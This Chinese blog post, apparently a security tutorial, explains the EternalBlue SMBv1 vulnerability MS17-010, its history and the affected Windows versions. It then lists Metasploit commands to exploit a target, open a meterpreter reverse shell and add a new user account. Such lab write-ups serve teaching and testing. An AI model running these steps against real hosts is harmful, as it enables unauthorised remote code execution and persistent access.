永恒之蓝漏洞--MS17-010

2787人浏览 / 0人评论

一、漏洞简介

MS17-010(永恒之蓝)漏洞原理是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码

 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让资源可互通。

MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞,远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-20170148。远程攻击者不需要身份验证就可以利用这些漏洞,通过专门制作的数据包来执行任意代码。

   2017年4月黑客团体影子经纪人(Shadow Brokers)窃取了美国国家安全局一份包含了SMB漏洞利用工具在内的文件,蓄意勒索,最后将其公之于众,吸引一批黑客团体利用这些工具开发成勒索软件对SMB漏洞MS17-010展开攻击,由此暴发了WannaCry勒索病毒事件
 

二、 影响版本

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
三、漏洞复现

1、进入mfs

msfconsole

2、搜索漏洞模块

use exploit/windows/smb/ms17_010_eternalblue

3、 设置靶机ip

 set RHOSTS 10.0.0.12

4、设置攻击者ip

 set LHOST 10.0.0.8

5、设置payload

 set payload windows/x64/meterpreter/reverse_tcp 反向连接

6、运行

run

7、攻击成功后

 攻击成功后直接输入shell即可
dir命令查看目录
net user test1 123.com /add  创建用户

 

全部评论